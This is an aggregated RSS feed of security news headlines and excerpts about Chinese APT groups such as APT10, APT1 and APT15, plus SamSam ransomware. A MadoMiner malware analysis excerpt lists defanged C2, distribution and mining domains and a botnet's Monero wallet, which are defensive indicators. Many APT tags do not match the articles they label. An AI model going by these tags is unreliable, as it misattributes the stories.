www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
Feed date: 2024-05-23T20:11:07+00:00 (www.secnews.physaphae.fr)

InformationSecurityBuzzNews (security news site): APT10 Targeted Norwegian MSP And US Companies In Sustained Cyber Attack
Published 2019-02-11T21:30:02+00:00. Source: https://www.informationsecuritybuzz.com/expert-comments/apt10-targeted-norwegian/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=1023008. Tags: APT 10.

ZD Net (IT magazine): China hacked Norway's Visma cloud software provider
Published 2019-02-06T15:01:00+00:00. Source: https://www.zdnet.com/article/china-hacked-norways-visma-cloud-software-provider/#ftag=RSSbaffb68 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=1020001. Tags: APT 10.

AlienVault Blog (AlienVault is a major defensive player in IOCs): APT10 Group Targets Multiple Sectors, But Seems to Really Love MSSPs
Threat Actors That Don't Discriminate
When it comes to threat actors and the malware variants they use, let's talk dating — or rather, the way people date — because one could argue there are marked similarities between the two. You see, there are criminal groups who have a "type," i.e. using malware that targets specific industries or even organizations — say, financial services (ever-popular and oh-so debonair) or perhaps critical infrastructure (spicy and daring!), or even healthcare for those who prefer staid and demure. Yet other groups are the free lovin' types who go after multiple sectors using many different malware variants and approaches to accomplish their goal — no discriminating with this bunch. Let's look at one such example, APT10 / Cloud Hopper, which is likely the group behind a long running, sophisticated campaign that uses multiple malware variants to target many different sectors in many different countries.
You can check out some of the pulses relating to APT10 / Cloud Hopper on the Open Threat Exchange (OTX). The U.S. National Cybersecurity and Communications Integration Center (NCCIC) reports the campaign started in May 2016, and NCCIC last updated its alert in December 2018 — so it's not going away yet. The group known as APT10 / Cloud Hopper has hit quite a few victims over the last few years in many different sectors, such as: information technology, energy, healthcare and public health, communications, and critical manufacturing. However, their "date of choice" seems to be MSSPs, because credential compromises within those networks could potentially be leveraged to access customer environments. From OTX pulse "Operation Cloud Hopper": The espionage campaign has targeted managed IT service providers (MSSPs), allowing the APT10 group unprecedented potential access to the intellectual property and sensitive data of those MSSPs and their clients globally. This indirect approach of reaching many through only a few targets demonstrates a new level of maturity in cyber espionage – so it's more important than ever to have a comprehensive view of all the threats your organization might be exposed to, either directly or through your supply chain.
As any clever serial dater would do, APT10 / Cloud Hopper doesn't use just one approach. The NCCIC reports they have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures — for example, PLUGX / SOGU and REDLEAVES. And although the observed malware is based on existing malware code, APT10 / Cloud Hopper modifies it to improve effectiveness and avoid detection by existing signatures.
How Can APT10 Group Impact You?
If these free lovin' bad guys decide to come after you, they're likely looking for your data (perhaps to steal intellectual property). At a high level, they're accomplishing this by leveraging stolen administrative credentials (local and domain) and certificates to place sophisticated malware implants (such as PlugX and Redleaves) on critical systems. Depending on the defensive mitigations in place, they then gain full access to networks and data in a way that appears legitimate to your existing monitoring tools. Voila! They've gone from first date to a home run! Wired Maga
Published 2019-01-31T17:24:00+00:00. Source: https://feeds.feedblitz.com/~/594984126/0/alienvault-blogs~APT-Group-Targets-Multiple-Sectors-But-Seems-to-Really-Love-MSSPs Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=1017733. Tags: Threat, Malware, Vulnerability, APT 10.

Malwarebytes Labs (MalwarebytesLabs): A week in security (January 14 – 20)
A roundup of last week's security news from January 14 to 20, including APT10, Fallout EK, Collection 1 data, YouTube challenges, hosting malicious sites and a Fortnite security flaw. Categories: Security world, Week in security. Tags: (Read more...)
Published 2019-01-21T16:48:03+00:00. Source: https://blog.malwarebytes.com/security-world/2019/01/week-security-january-14-20/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=1002626. Tags: APT 10.

Malwarebytes Labs (MalwarebytesLabs): The Advanced Persistent Threat files: APT10
While security companies are getting good at analyzing the tactics of nation-state threat actors, they still struggle with placing these actions in context and making solid risk assessments. So in this series, we're going to take a look at a few APT groups, and see how they fit into the larger threat landscape, starting with APT10. Categories: Cybercrime, Hacking. Tags: (Read more...)
Published 2019-01-16T17:00:00+00:00. Source: https://blog.malwarebytes.com/cybercrime/2019/01/advanced-persistent-threat-files-apt10/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=995575. Tags: Threat, APT 10.

Krebs on Security (American researcher): "Stole $24 Million But Still Can't Keep a Friend"
Published 2019-01-16T00:52:03+00:00. Source: https://krebsonsecurity.com/2019/01/stole-24-million-but-still-cant-keep-a-friend/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=994420. Tags: APT 15.

taosecurity (Chinese security blog): Managing Burnout
This is not strictly an information security post, but the topic likely affects a decent proportion of my readership. Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout. I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.
How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December. The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company. (It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)
Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.
At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!
Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of information security.
In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.
By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)
In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security
Published 2018-12-21T16:30:11+00:00. Source: https://taosecurity.blogspot.com/2018/12/managing-burnout.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=959069. Tags: APT 1.

SecurityWeek (Security News): Industry Reactions to U.S. Charging APT10 Hackers: Feedback Friday
pointed the finger at China for sophisticated cyberattacks launched by a threat group known as APT10 against organizations around the world. The U.S.
Published 2018-12-21T15:51:02+00:00. Source: https://www.securityweek.com/industry-reactions-us-charging-apt10-hackers-feedback-friday Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=960598. Tags: Threat, APT 10.

ZD Net (IT magazine): Five other countries formally accuse China of APT10 hacking spree
Published 2018-12-21T15:44:05+00:00. Source: https://www.zdnet.com/article/five-other-countries-formally-accuse-china-of-apt10-hacking-spree/#ftag=RSSbaffb68 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=958707. Tags: APT 10.

Bleeping Computer (American magazine): Historic APT10 Cyber Espionage Group Breached Systems in Over 12 Countries
Published 2018-12-21T09:55:03+00:00. Source: https://www.bleepingcomputer.com/news/security/historic-apt10-cyber-espionage-group-breached-systems-in-over-12-countries/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=958588. Tags: APT 10.

SecurityWeek (Security News): 'Five Eyes' Nations Blame China for APT10 Attacks
Published 2018-12-21T07:24:01+00:00. Source: https://www.securityweek.com/five-eyes-nations-blame-china-apt10-attacks Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=958289. Tags: Threat, APT 10.

The Hacker News (The Hacker News is a hacking news blog, surprising, isn't it?): US Indicts Two Chinese Government Hackers Over Global Hacking Campaign
Published 2018-12-20T23:45:03+00:00. Source: https://thehackernews.com/2018/12/chinese-hacker-wanted-by-fbi.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=958015. Tags: APT 10.

Kaspersky Threatpost (Kaspersky is a Russian antivirus vendor): U.S.
Indicts China-Backed Duo for Massive, Years-Long Spy Campaign
Published 2018-12-20T19:38:02+00:00. Source: https://threatpost.com/china-duo-charged-spy-campaign/140227/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=957261. Tags: APT 10.

ZD Net (IT magazine): US charges two Chinese nationals for hacking cloud providers, NASA, the US Navy
Published 2018-12-20T16:38:00+00:00. Source: https://www.zdnet.com/article/us-charges-two-chinese-nationals-for-hacking-cloud-providers-nasa-the-us-navy/#ftag=RSSbaffb68 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=957052. Tags: APT 10.

AlienVault Blog (AlienVault is a major defensive player in IOCs): Let's Chat: Healthcare Threats and Who's Attacking
breach portal (as of November 30, 2018). This includes the likes of unauthorized access or disclosures of patient data, hacking, theft of data, data loss and more. Bottom line, if you're tasked with protecting any entity operating in the healthcare sector, you're likely experiencing some very sleepless nights — and may just need a doctor yourself. So . . . who's wreaking all this havoc and how? According to AlienVault Labs, opportunistic ransomware is still a preferred method of attack. However, researchers are reporting a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities for making money from healthcare providers and other similar entities who must protect and keep assets, systems, and networks continuously operating. One such criminal group operating the SamSam ransomware is thought to have earned more than $5 million by manually compromising critical healthcare networks (see below for more info). The group behind SamSam has invested heavily in their operations (likely an organized crime syndicate) and has won the distinction of being the subject of two FBI Alerts in 2018. And, according to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than typical opportunistic ransomware. SamSam attacks also seem to go in waves. One of the most notable was a spring 2018 hit on a large New York hospital which publicly declined to pay the attackers' $44,000 ransom demand. It took a month for the hospital's IT system to be fully restored.
SamSam attackers are known to:
- Gain remote access through traditional attacks, such as JBoss exploits
- Deploy web-shells
- Connect to RDP over HTTP tunnels such as ReGeorg
- Run batch scripts to deploy the ransomware over machines
SamSam isn't going away either. AlienVault Labs has seen recent variants. You might want to read more about the threat actors behind SamSam, their methods of attacks, and recommendations for heading
Published 2018-12-20T14:00:00+00:00. Source: https://feeds.feedblitz.com/~/588421296/0/alienvault-blogs~Let%e2%80%99s-Chat-Healthcare-Threats-and-Who%e2%80%99s-Attacking Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=956718. Tags: Threat, APT 23, APT 19, APT 18, Wannacry, APT 22.

ZD Net (IT magazine): Google launches reCAPTCHA v3 that detects bad traffic without user interaction
Published 2018-10-30T00:08:00+00:00. Source: https://www.zdnet.com/article/google-launches-recaptcha-v3-that-detects-bad-traffic-without-user-interaction/#ftag=RSSbaffb68 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=869675. Tags: APT 19.

AlienVault Blog (AlienVault is a major defensive player in IOCs): MadoMiner Part 2 - Mask
MadoMiner analysis, please do so now. This analysis will pick up where Part 1 left off, while also including a brief correction. The x64 version of the Install module was listed as identical to the x86 Install module. However, this is not correct. The x64 Install module is identical in run-through to the 360Safe.exe module, which will be discussed later in this analysis. In addition, take care with this portion of the malware. The batch script for Mask.exe, DemC.bat, appears to run if it detects any copies of itself during runtime, or if you run the x64 version of Install on a 32-bit machine.
Where Install.exe was in charge of infecting new victims with MadoMiner, it seems Mask.exe is where the real payoff lies. Mask.exe utilizes XMRig miners in order to mine for XMR, which it then sells for profit. While MadoMiner was earning $6,000 a month as of the last analysis, around 10/14 MineXMR closed the old address due to botnet reports. A new address has been identified at 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433, mining through minexmr.com again. Currently, the hashrate is at 109 Kh/s and steadily rising. Also, around the time that the address changed, MadoMiner also became drastically different.
Malware Analysis
Where Install.exe only downloaded one file from a remote host, Mask.exe downloads two files. In addition, the servers used to download the files are also different from those used by Install.exe, increasing the proposed size of the botnet.
Domains
In addition to the two domains identified in Part 1, a new domain has also been identified for a distribution server: http://d.honker[dot]info. However, the domain is currently dead. In addition, the mining server currently used is pool.minexmr[dot]com. A C2 server (newly updated version): http://qq.honker[dot]info
Previously identified distribution domains: http://da[dot]alibuf.com:3/ and http://bmw[dot]hobuff.info:3/
Previously identified IPs: 61.130.31.174
Previously identified mining servers: http://gle[dot]freebuf.info, http://etc[dot]freebuf.info, http://xmr[dot]freebuf.info, http://xt[dot]freebuf.info, http://boy[dot]freebuf.info, http://liang[dot]alibuf.com, http://dns[dot]alibuf.com, http://x[dot]alibuf.com
In addition, http://da[dot]alibuf.com:3, the main distribution server, seems to have been registered by bodfeo[at]hotmail.com in early October 2017. According to an analysis by Steve Butt of DomainTools, this email was linked to APT19/c0d0s0; however, that was most likely due to domain reselling.
Exploits
During the execution
Published 2018-10-29T17:00:00+00:00. Source: https://feeds.feedblitz.com/~/577320150/0/alienvault-blogs~MadoMiner-Part-Mask Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=869226. Tags: APT 19.

InformationSecurityBuzzNews (security news site): Oceansalt Cyberattack Wave Linked To Defunct Chinese APT Comment Crew
Published 2018-10-19T15:30:05+00:00. Source: https://www.informationsecuritybuzz.com/expert-comments/oceansalt-cyberattack-wave/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=855291. Tags: Threat, Tool, APT 32, APT 1.

Security Affairs (security blog): Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
Published 2018-10-19T07:06:03+00:00. Source: https://securityaffairs.co/wordpress/77228/apt/operation-oceansalt.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=854509. Tags: Threat, Malware, APT 32, APT 1.

Kaspersky Threatpost (Kaspersky is a Russian antivirus vendor): New APT Could Signal Reemergence of Notorious Comment Crew
Published 2018-10-18T19:17:05+00:00. Source: https://threatpost.com/new-apt-could-signal-reemergence-of-notorious-comment-crew/138440/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=853971. Tags: Malware, APT 1.

Wired Threat Level (Security News): The Mysterious Return of Years-Old APT1 Malware
Published 2018-10-18T04:01:00+00:00. Source: https://www.wired.com/story/mysterious-return-of-years-old-chinese-malware-apt1 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=852846. Tags: Malware, APT 1.

ZD Net (IT magazine): Oceansalt cyberattack wave linked to defunct Chinese APT Comment Crew
Published 2018-10-18T04:01:00+00:00. Source: https://www.zdnet.com/article/seasalt-cyberattack-wave-linked-to-chinese-apt-comment-crew/#ftag=RSSbaffb68 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=852815. Tags: Malware, APT 32, APT 1.

Bleeping Computer (American magazine): New
Reconnaissance Tool Uses Code from Eight-Year-Old Comment Crew Implant
Published 2018-10-18T00:01:00+00:00. Source: https://www.bleepingcomputer.com/news/security/new-reconnaissance-tool-uses-code-from-eight-year-old-comment-crew-implant/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=853394. Tags: Threat, Tool, APT 1.

ZD Net (IT magazine): DHS aware of ongoing APT attacks on cloud service providers
Published 2018-10-03T17:00:00+00:00. Source: https://www.zdnet.com/article/dhs-aware-of-ongoing-apt-attacks-on-cloud-service-providers/#ftag=RSSbaffb68 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=830249. Tags: APT 10.

Zataz (French security magazine): Data leak fixed for Info Greffe
Data leak fixed for Info Greffe appeared first on ZATAZ.
Published 2018-09-23T14:33:04+00:00. Source: https://www.zataz.com/fuite-de-donnees-corrigee-pour-info-greffe/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=821188. Tags: APT 15.

Security Affairs (security blog): China-linked APT10 group behind new attacks on the Japanese media sector
Published 2018-09-15T08:34:01+00:00. Source: https://securityaffairs.co/wordpress/76204/breaking-news/apt10-japanese-media-sector.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=809152. Tags: APT 10.

SecurityWeek (Security News): China-linked APT10 Hackers Update Attack Techniques
Published 2018-09-14T17:23:01+00:00. Source: https://www.securityweek.com/china-linked-apt10-hackers-update-attack-techniques Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=814005. Tags: Threat, APT 10.

Mandiant (Mandiant's security blog): APT10 Targeting Japanese Corporations Using Updated TTPs
Introduction
In July 2018, FireEye devices detected and blocked what appears to be APT10 (Menupass) activity targeting the Japanese media sector. APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009, and they have a history of targeting Japanese entities. In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. This backdoor is well-known in the security community as ANEL, and it used to come in beta or RC (release candidate) until recently. Part of this blog post will discuss the
Published 2018-09-13T11:00:00+00:00. Source: https://www.mandiant.com/resources/blog/apt10-targeting-japanese-corporations-using-updated-ttps Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=8377731. Tags: Technical, APT 10.
Security Affairs (security blog): Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
Published 2018-09-10T18:59:03+00:00. Source: https://securityaffairs.co/wordpress/76077/apt/luckymouse-apt-filtering-driver.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=801937. Tags: Threat, APT 27, APT 1.

Kaspersky Threatpost (Kaspersky is a Russian antivirus vendor): APT10 Under Close Scrutiny as Potentially Linked to Chinese Ministry of State Security
Published 2018-09-03T12:49:03+00:00. Source: https://threatpost.com/apt10-under-close-scrutiny-as-potential-chinese-ministry-of-state-security-contractor/137139/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=795027. Tags: Threat, APT 10.

Krebs on Security (American researcher): The Year Targeted Phishing Went Mainstream
Published 2018-08-02T15:11:04+00:00. Source: https://krebsonsecurity.com/2018/08/the-year-targeted-phishing-went-mainstream/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=763823. Tags: APT 15.

TechRepublic (Security News US): Google Chrome launches on Daydream headsets, could make enterprise VR training a reality
Published 2018-07-31T14:03:05+00:00. Source: https://www.techrepublic.com/article/google-chrome-launches-on-daydream-headsets-could-make-enterprise-vr-training-a-reality/#ftag=RSS56d97e7 Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=760505. Tags: APT 15.

AlienVault Blog (AlienVault is a major defensive player in IOCs): Things I Hearted this Week, 20th July 2018
InfoSec Recruiting – Is the Industry Creating its own Drought? | Liquid Matrix
GDPR
Did you think that discussions around GDPR were over? You thought wrong.
Want to avoid GDPR fines? Adjust your IT Procurement methods | HelpNetSecurity
SEXTORTION SCAMS
A clever new twist on an extortion email scam includes a password the recipient previously used at a hacked website, to lend credence to claims that the sender has hacked the recipient's computer / webcam and recorded embarrassing videos.
Sextortion Scam Uses Recipient's Hacked Passwords | Krebs on Security
TESLA
Elon Musk continues to make the headlines, sometimes for the right, and other times for the wrong reasons. But it's worth taking a look at the company's security. While there was the infamous email a few weeks back where Musk pointed the finger of blame at a rogue employee, it's not the first case of cybersecurity gone wrong in the company. Tesla sued an oil-industry executive for impersonating Musk in an email. The trickster's goal was to undermine Tesla's energy-efficient transportation.
Here's why Tesla has been sabotaged twice in two years — lax network security | Last Watchdog
Published 2018-07-20T13:00:00+00:00. Source: http://feeds.feedblitz.com/~/559727188/0/alienvault-blogs~Things-I-Hearted-this-Week-th-July Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=747573. Tags: Tesla, APT 1.

CSO (CSO Daily Dashboard): Reduce breach risk and costs with security resilience
4 deception tools deliver truer network security. | Get the latest from CSO by signing up for our newsletters.
Published 2018-06-27T06:14:00+00:00. Source: https://www.csoonline.com/article/3284379/security/reduce-breach-risk-and-costs-with-security-resilience.html#tk.rss_all Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=725495. Tags: APT 17.

taosecurity (Chinese security blog): Bejtlich on the APT1 Report: No Hack Back
Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back. I would like to add my own color to this situation.
First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.
Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.
Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct it. There was internal debate about whether we should do that. We decided to cover the practice in the report, as Christopher Glyer Tweeted:
In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.
Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I asked former Mandiant colleagues, like myself,
Published 2018-06-25T15:03:20+00:00. Source: https://taosecurity.blogspot.com/2018/06/bejtlich-on-apt1-report-no-hack-back.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=722517. Tags: Hack, APT 1.

Kaspersky Threatpost (Kaspersky is a Russian antivirus vendor): APT15 Pokes Its Head Out With Upgraded MirageFox RAT
Published 2018-06-19T21:58:03+00:00. Source: https://threatpost.com/apt15-pokes-its-head-out-with-upgraded-miragefox-rat/132943/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=713210. Tags: APT 15.

Security Affairs (security blog): China-Linked APT15 is still very active, experts found its new malware tracked as 'MirageFox'
Published 2018-06-18T12:41:02+00:00. Source: https://securityaffairs.co/wordpress/73636/apt/apt15-miragefox-malware.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=710278. Tags: APT 25, APT 15.

SecurityWeek (Security News): China-Linked APT15 Develops New 'MirageFox' Malware
Published 2018-06-18T04:38:03+00:00. Source: https://www.securityweek.com/china-linked-apt15-develops-new-miragefox-malware Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=712098. Tags: APT 15.

Security Affairs (security blog): China-linked Emissary Panda APT group targets National Data Center in Asia
Published 2018-06-14T06:23:04+00:00. Source: https://securityaffairs.co/wordpress/73498/apt/emissary-panda-campaign.html Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=703940. Tags: APT 27, APT 1.

Bleeping Computer (American magazine): New Service Blocks EU Users So Companies Can Save Thousands on GDPR Compliance
Published 2018-05-05T12:13:02+00:00. Source: https://www.bleepingcomputer.com/news/security/new-service-blocks-eu-users-so-companies-can-save-thousands-on-gdpr-compliance/ Aggregator entry: www.secnews.physaphae.fr/article.php?IdArticle=629274. Tags: APT 19.

Bleeping Computer (American magazine): Facebook's Phishing Detection Tool Now Recognizes Homograph Attacks
Published 2018-05-03T14:35:04+00:00. Source:
https://www.bleepingcomputer.com/news/security/facebooks-phishing-detection-tool-now-recognizes-homograph-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=625181 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Explain PGP Encryption: An Operational Introduction If you don’t already know what Pretty Good Privacy (PGP) is; you may have heard of PGP before, perhaps during a discussion on how to secure your communications, or perhaps in one of those how-to maintain privacy guides. PGP is a popular solution for encrypting, decrypting, signing, and verifying messages and files, often found in email communications and package repository identity verification (because security matters). Most generic guides simply explain PGP at a high-level or how to encrypt and decrypt messages using specific software, and not much more than that. The goal of this introduction to PGP is to illustrate a more timeless and operational approach to using PGP safely, with respect to both information security and operational security. Firstly, we introduce PGP theoretically and practically, this means understanding how PGP works and what we can actually do with PGP. To better understand our security stance, we assess the CIA Triad, a theoretical Information Security model, that considers the confidentiality, integrity, and availability of information. Next, we get familiar with our threat model (similar to OPSEC Model); in this step, we analyze personalized risks and threats. To mitigate any identified threats and reduce risk, we implement operational security practices. 
At a more concise glance, we will discuss the following: PGP, OpenPGP & GPG Public & Private Key Pairs Information Security (CIA Triad) Confidentiality: message encryption, information storage Integrity: message/file authenticity, web of trust Availability: key servers, web of trust, metadata Assessing Threats & Risk Threat Modeling Operational Security Clients & Use Guides: Windows, Linux, Mac, Web With that caveat in mind, let’s jump straight in. PGP, OpenPGP & GPG: What is it? PGP is a protocol used for encrypting, decrypting and signing messages or files using a key pair. PGP is primarily used for encrypting communications at the Application layer, typically used for one-on-one encrypted messaging. You may find yourself needing to use PGP if you want to be certain that only the intended receiver can access your private message, thwarting the efforts of intercepting parties, or if you just want to verify the sender’s identity. There are different variations of PGP: OpenPGP, PGP and GPG, but they generally all do the same thing. Here is the quick terminology run-down: PGP: Pretty Good Privacy, original proprietary protocol. Released in 1991. OpenPGP: Pretty Good Privacy, but it is an open-source version, and it has become the universally-accepted PGP standard. Released in 1997. GPG: GNU Privacy Guard, another popular solution that follows OpenPGP standards. Released in 1999. 
When someone says PGP, it is generally s 2018-03-26T13:00:00+00:00 http://feeds.feedblitz.com/~/535192976/0/alienvault-blogs~Explain-PGP-Encryption-An-Operational-Introduction www.secnews.physaphae.fr/article.php?IdArticle=542673 False None APT 15 None

Kaspersky Threatpost - Kaspersky is a Russian antivirus vendor China-Linked APT15 Used Myriad of New Tools To Hack UK Government Contractor 2018-03-13T16:16:02+00:00 https://threatpost.com/china-linked-apt15-used-myriad-of-new-tools-to-hack-uk-government-contractor/130376/ www.secnews.physaphae.fr/article.php?IdArticle=510990 False None APT 15 None

Security Affairs - Security Blog China-Linked APT15 used new backdoors in attack against UK Government's service provider 2018-03-12T18:07:04+00:00 http://securityaffairs.co/wordpress/70140/hacking/apt15-uk-gov-contractor.html www.secnews.physaphae.fr/article.php?IdArticle=508870 False None APT 15 None

Bleeping Computer - American magazine New Tools Make Checking for Leaked Passwords a Lot Easier 2018-03-02T05:51:02+00:00 https://www.bleepingcomputer.com/news/security/new-tools-make-checking-for-leaked-passwords-a-lot-easier/ www.secnews.physaphae.fr/article.php?IdArticle=494453 False None APT 19 None

NoticeBored - Experienced IT Security professional NBlog March 1 - Invasion of the Cryptominers That's it, we're done! The 2018 malware awareness module is on its way to NoticeBored subscribers, infecting customers with ... our passion for the topic. There are 28 different types of awareness and training material, in three parallel streams as always: Stream A: security awareness materials for staff/all employees 1. Train-the-trainer guide on malware (MS Word document) 2018-02-28T21:54:40+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/lGwDU0lQ3UU/nblog-march-1-invasion-of-cryptominers.html www.secnews.physaphae.fr/article.php?IdArticle=492308 False Malware APT 15 None

Zataz - French security magazine Leak of customer email addresses for the Info greffe website. The post "Leak of customer email addresses for the Info greffe website" appeared first on ZATAZ. 2018-02-18T18:58:01+00:00 https://www.zataz.com/fuite-de-donnees-site-info-greffe/ www.secnews.physaphae.fr/article.php?IdArticle=482789 False None APT 15 None

AlienVault Blog - AlienVault is a major defense actor in IOCs Debunking these 3 Domain Name Registration Myths Once and For All Exact match domains (EMDs) used to be a thing (or still are, depending on who you talk to). You stuffed a few keywords into the domain before checkout to give yourself that extra edge to rank for cut-throat queries like “bestvitaminshop.com.” Domain age has also been rumored to influence rankings. Somehow, the older the domain and the longer you register it for tells Google… to like you more? Admittedly, the logic is flimsy. But Google originally debunked these myths in 2009, according to some digging by Matt McGee at Search Engine Land. First, they had a Google Webmaster Help forum thread where Googler John Mueller addressed this question head-on: “A bunch of TLDs do not publish expiration dates — how could we compare domains with expiration dates to domains without that information? It seems that would be pretty hard, and likely not worth the trouble. Even when we do have that data, what would it tell us when comparing sites that are otherwise equivalent?
A year (the minimum duration, as far as I know) is pretty long in internet-time :-).” Next up, they had former Google PR chief, Matt Cutts, on the record several times addressing this issue: “To the best of my knowledge, no search engine has ever confirmed that they use length-of-registration as a factor in scoring. If a company is asserting that as a fact, that would be troubling.” So there you have it. “Officially,” domain registrations don’t affect SEO. At least, not directly. Recently, there’s some evidence that search engine result page (SERP) click-through rate (CTR) affects rankings. One experiment had a sizable group of people click on a random listing in the seventh position to see what (if any) changes occurred. And within just a few hours? Straight to the top. The finding shows an odd correlation between SERP performance and its influence on ranks. The point being that it is possible that a better domain name, one that’s more credible and interesting for people to click, could indirectly influence rankings. The industry standard .com domain is still seen as the most credible, even though new top-level domains (TLDs) continue to pop up and gain acceptance. Studies have backed this up, showing that .com domains generally dr 2018-02-06T14:00:00+00:00 http://feeds.feedblitz.com/~/523389918/0/alienvault-blogs~Debunking-these-Domain-Name-Registration-Myths-Once-and-For-All www.secnews.physaphae.fr/article.php?IdArticle=465029 False None APT 19 None

AlienVault Blog - AlienVault is a major defense actor in IOCs OTX Trends Part 3 - Threat Actors Part 1 focused on exploits and part 2 addressed malware. This part will discuss threat actors and patterns we have detected with OTX. Which threat actors should I be most concerned about? Which threat actors your organization should be most concerned about will vary greatly. A flower shop will have a very different threat profile from a defense contractor.
